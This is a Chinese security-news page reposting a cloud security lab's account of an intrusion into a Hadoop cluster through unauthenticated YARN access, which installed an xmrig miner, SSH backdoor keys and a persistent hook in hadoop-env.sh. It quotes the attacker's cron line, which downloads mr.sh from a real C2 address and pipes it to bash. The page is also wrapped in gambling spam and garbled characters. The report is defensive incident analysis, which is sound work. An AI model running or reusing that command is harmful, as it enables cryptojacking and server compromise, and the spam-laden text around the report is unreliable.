• 川藏兵站部官兵在执行任务中传播党的声音 2019-07-03
  • 泼皮无赖风水神,尔等猪脑子是从哪里推断————“腐败分子是天上掉下来的吗?”——这是四两千斤向第十阶层发问。 2019-07-03
  • 夏季养生小常识 多吃酸食少吃冷 让你更健康-美食资讯 2019-06-02
  • 重磅:国民党前主席洪秀柱到访西藏提出这点希望颇有深意 2019-06-02
  • 南宁地铁2号线今日正式开通试运营 2019-06-01
  • 一根充电线从天而降 楼下玛莎拉蒂被砸出两个凹陷 2019-05-14
  • 炒房炒房,炒了北京炒西安,炒了天堂炒人间,何时休?限价现价叫人害怕。 2019-05-14
  • 以仪式守护节日文化--旅游频道 2019-05-14
  • 紫光阁中共中央国家机关工作委员会 2019-05-13
  • 法国:巴黎发生劫持人质事件   2019-05-13
  • 人民日报评论员:牢牢把握新时代中国共产党的历史使命 2019-05-13
  • 【理上网来·喜迎十九大】科学准确把握政府与市场关系 2019-05-12
  • 坚决依靠人民群众才能打好打持久战。 2019-05-12
  • 火场上的那双手,找到了! 2019-05-12
  • 张柏芝黑裙出席活动 大长腿十分吸睛 2019-05-12
  • 欢迎来到太平洋安防网!
    微信号
    扫描上方二维码
    加入网站订阅号
    扫描上方二维码
    加入商城公众号
    手机站
    扫描上方二维码
    访问手机站
    重庆时时彩最新算法
    资讯
    当前位置:重庆时时彩最新算法 > 资讯 > 行业资讯

    重庆时时彩平代理:金山云安珀实验室:处理一起黑客利用Hadoop集群挖矿事件

    重庆时时彩最新算法 www.lsir.com.cn 2019-01-04 18:31:08来源:企业来稿已被 160 人阅读

    内容摘要:近日,晚间10点左右,金山云值班人员接用户紧急反?。涸谝滴窨⒐讨?,Hadoop集群某一结点输入`hdfs dfs –ls /`会显示未知的公钥信息,怀疑自身服务被恶意入侵。
       近日,晚间10点左右,金山云值班人员接用户紧急反?。涸谝滴窨⒐讨?,Hadoop集群某一结点输入`hdfs dfs –ls /`会显示未知的公钥信息,怀疑自身服务被恶意入侵。

      在获知该信息后,金山云安珀实验室迅速进行响应,第一时间与用户进行沟通和分析排查,最后确定是黑客通过Hadoop的REST API服务Yarn的未授权访问造成远程命令执行入侵,经过追踪分析处理,最后成功解除攻击威胁。

      以下我们将详细过程分享出来,与业界共勉,共同提升安全防御水平。

      追踪黑客来源:凡走过必定留下蛛丝马迹

      在接到异常信息后,安珀实验室研究员立刻启动分析预警流程:先确认是否被入侵、入侵的方式及可能造成的损失。通过使用命令“hdfs”进行试探,发现存在异常信息,进一步分析,在/var/spool/cron目录下,发现了若干计划任务文件,证明该服务器确实被入侵。

      

      通过分析,我们成功追踪到黑客的C&C服务器地址(//149.**.***.164:8220),连接到黑客的C2服务器上下载mr.sh并进一步分析,发现脚本存在如下几个特征:

      1、脚本会删除其他的挖矿进程;

      2、删除CPU占用率大于40的进程。

      在上述操作执行完毕后,会下载真正的挖矿程序top,以及配置文件wc.conf,配置文件中包含挖矿的密码等信息。接着,会自动添加计划任务,将黑客的公钥添加到~/.ssh/authorized_keys文件中,实现黑客免密码登陆的目的。

      脚本还会将受害服务器的IP、用户名、主机名等信息发送到黑客的服务器上,结合其将公钥写入到了~/.ssh/authorized_keys文件中,我们初步推测黑客可能通过脚本进行批量ssh登陆,从而实现批量管理肉鸡的目的。

      接下来,我们按照该入侵路线排查用户的服务器,不过并没有发现同样的问题,猜测后门可能是在其他位置,经过详细排查,最后在/etc/hadoop/3.0.0.0-1634/0/hadoop-env.sh文件中,发现有被写入后门的痕迹。

      

      抽丝剥茧求真相:再狡猾的狐狸也会露出尾巴

      在上述文件中,我们发现有三行同样格式的后门,可以推测,服务器被黑客利用自动化脚本攻击了三次,同时,我们还发现了新的攻击脚本install.sh。将其下载后进行分析,发现该脚本会判断是否写过计划任务,如果写过的话会输入Cron exists,这恰好是之前用户反馈的问题。

      通过后续的分析得知,当执行hdfs等hadoop所属的命令后,会先执行/usr/bin/hdfs,而这个可执行程序是个链接,链接到/usr/hdp/current/hadoop-hdfs-client/bin/hdfs文件。我们通过查看该文件,最终发现会执行红框内的代码,我们继续追踪如下:

      

      1、查看该文件的内容,发现会执行libexec目录下的hdfs-config.sh脚本。

      2、跟踪过去,在文件尾部会调用hadoop-function.sh文件。

      3、继续跟踪,发现会执行conf目录下的hadoop-env.sh。该文件是黑客留有后门的文件,也就是说,用户在执行该命令的时候,就会调用黑客留下的后门,其他有关hadoop的命令也是如此。

      根据和使用该服务器的用户交流来判断,之前该服务器启动过yarn服务,并且使用默认配置,没有进行任何的认证,开放在公网的8088端口,结合该Hadoop集群来看,黑客应该是通过Hadoop Yarn未授权访问漏洞入侵的。

      并且,通过查看/etc/hosts文件,发现该集群还有其他几个节点,分别是node1(已经废弃使用很久),node2(本文分析的服务器,且还开放在公网上),node3(未连接公网),node4(未连接公网),其他节点都可以通过ssh + 主机名的方式直接登陆,并且也都发现已经被入侵了,但是通过计划任务被写入的时间点来看,其他机器并不是通过跳板入侵的,而是通过自动化脚本攻击的。

      分析top挖矿程序,我们看到该程序是一个用于挖矿的软件,真实名字叫做xmrig。

      将其md5值放入VirusTotal查询,发现有13家报毒,是一款挖矿软件。

      

      分析至此,整件事件已经梳理清楚,黑客通过yarn服务入侵到服务器,并且写入了后门,执行install.sh, mr.sh程序,进行挖矿,期间通过漏洞写入了三次后门,C&C服务器IP为新加坡,但是由于install.sh存在报错机制,导致被发现。

      此次事件金山云安珀实验室应对之道

      1.建议客户登陆各个节点,将/etc/hadoop/3.0.0.0-1634/0/hadoop-env.sh文件结尾的后门进行删除;

      2.登陆各个节点,到/var/spool/cron目录下,查看每个文件,如果内容是0 * * * * //149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1,删除该文件;

      3.增加hadoop kerberos认证;

      4.将私用的服务放置在内网环境中使用,开放在公网的服务一定要加入认证环节。

      以上是金山云在近期追踪并成功解决的一起比较典型的安全事件,在网络上,每天都有无数的黑客程序在自动巡游,一旦发现安全薄弱的设备,很快就能通过各种手段进行入侵,这就要求我们树立起牢固的安全防范意识,防患于未然。

    参加太平洋安防网微信公众号活动即有机会获赠全年杂志、太平洋安防官网免费广告位。安防广告随你登,免费杂志任你领!
    还等什么呢?微信扫描上方二维码关注吧!
    免责声明:凡注明来源本网的所有作品,均为本网合法拥有版权或有权使用的作品,欢迎转载,注明出处。非本网作品均来自互联网,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
    [责任编辑:wangmengbing]
    0条 [查看全部]  相关评论

    阅读推荐

    阿里 腾讯觊觎的万亿级市场 国内智慧停车企业大盘点

    按国际惯例,我国城市停车位缺口普遍超过50%,停车难已经成我国城市交通的通病。

    专家:谨防人工智能芯片成炒作噱头

    近期,国内不少互联网及通信行业巨头纷纷追捧人工智能芯片。虽然很多厂商的人工智能..

    加速融合 安防业务正腾“云”而起

    企业上云自提出至今,热度一直居高不下:昨天(2018年11月26日),河北省工信厅举办万..

    经常忘带钥匙,这样的生活还要持续多久……

    周天的夜,寒冷而安静。垃圾桶再没有可容得下泡面的包装的空间,披上件大衣便下楼。..

    热烈祝贺【安视?!砍晒遗菩氯?!

    深圳安视睿信息技术股份有限公司成功挂牌新三板!这意味着安视睿将开启新征程,向打..

    技术资料

    液位继电器介绍继电器是根据某种输入信号来接通或断开小电流控制电路,实现远距离控..

    ?

    客服专线:0755-83977321|市场招商热线:0755-83976188、83977188

    广告
    合作
    :2250409004
    网站
    客服
    :1351574492
    新闻
    投稿
    :1197354471
    技术
    支持
    :712700030

    网站备案号:粤ICP备12031422号-1 经营许可证编号:粤B2-20090398 深圳互联网科技创新企业

    太平洋安防网版权所有 2006-2019 互联网违法和不良信息举报中心:0755-83977321 [email protected]

    重庆时时彩最新算法
  • 川藏兵站部官兵在执行任务中传播党的声音 2019-07-03
  • 泼皮无赖风水神,尔等猪脑子是从哪里推断————“腐败分子是天上掉下来的吗?”——这是四两千斤向第十阶层发问。 2019-07-03
  • 夏季养生小常识 多吃酸食少吃冷 让你更健康-美食资讯 2019-06-02
  • 重磅:国民党前主席洪秀柱到访西藏提出这点希望颇有深意 2019-06-02
  • 南宁地铁2号线今日正式开通试运营 2019-06-01
  • 一根充电线从天而降 楼下玛莎拉蒂被砸出两个凹陷 2019-05-14
  • 炒房炒房,炒了北京炒西安,炒了天堂炒人间,何时休?限价现价叫人害怕。 2019-05-14
  • 以仪式守护节日文化--旅游频道 2019-05-14
  • 紫光阁中共中央国家机关工作委员会 2019-05-13
  • 法国:巴黎发生劫持人质事件   2019-05-13
  • 人民日报评论员:牢牢把握新时代中国共产党的历史使命 2019-05-13
  • 【理上网来·喜迎十九大】科学准确把握政府与市场关系 2019-05-12
  • 坚决依靠人民群众才能打好打持久战。 2019-05-12
  • 火场上的那双手,找到了! 2019-05-12
  • 张柏芝黑裙出席活动 大长腿十分吸睛 2019-05-12